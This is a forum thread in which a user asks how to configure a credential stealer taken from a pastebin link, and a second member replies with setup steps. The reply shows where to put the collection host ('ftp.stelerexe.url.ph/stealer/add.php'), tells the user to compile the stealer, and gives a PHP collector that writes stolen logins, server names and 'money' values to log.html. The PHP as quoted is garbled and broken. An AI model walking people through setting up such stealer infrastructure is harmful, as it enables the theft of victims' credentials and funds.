nandato322
Member
- Joined
- Jun 1, 2014
- Messages
- 7
- Reaction score
- 0
Hi, i was triying to use this :challenge_accepted:
http://pastebin.com/BHXd1uKd
But i have 2 problems.
key:
I do not understand is where I should add the URL of my site, and which of
I must change the "ftp.stelerexe.url.ph" by the full name of my website or what?
For example, if my page hostringer have a domain called "potato.hol.es" should put that name or "ftp.potato.hol.es"
And the second problem is that I do not understand how to add the file "add.php" to my page, I know how to upload files, but do not understand where that file goes and what content it should be. I mean, how to create a .php archive...
I would be very grateful if you help me with these problems :stoned:
Thanks for reading, greetings :urtheman:
http://pastebin.com/BHXd1uKd
But i have 2 problems.
I do not understand is where I should add the URL of my site, and which of
I must change the "ftp.stelerexe.url.ph" by the full name of my website or what?
For example, if my page hostringer have a domain called "potato.hol.es" should put that name or "ftp.potato.hol.es"
Code:
hex
"ftp:" 2f 2f "ftp.stelerexe.url.ph" 2f "stealer" 2f "add.php" 00
end
And the second problem is that I do not understand how to add the file "add.php" to my page, I know how to upload files, but do not understand where that file goes and what content it should be. I mean, how to create a .php archive...
Curoar link said:Do you even try? :kidding: After one minute of using google I already found your answer.
hex
"ftp:" 2f 2f "ftp.stelerexe.url.ph" 2f "stealer" 2f "add.php" 00
end
This is where you insert the hosts URL
Then you compile the script.
Add the add.php to your host
<? Php
$ s = date ("H: I: sm.dy"). "Login:". $ _GET ['Log']. "Server:". $ _GET ['Srvr']. "Info:". $ _GET ['Inf'];
if ($ _GET ['H'])
{
$ s = $ s. "Money:". $ _GET ['Mn'];
}
$ s = $ s. "
"; if (strlen ($ _GET ['inf'])> 2) { $ F = fopen ("log.html", "A"); fwrite ($ F, $ s); fclose ( $ F); } ?>
And that's it.
If you are incapable of doing this after being given all of this, you shouldn't tinker with this stuff.
I would be very grateful if you help me with these problems :stoned:
Thanks for reading, greetings :urtheman: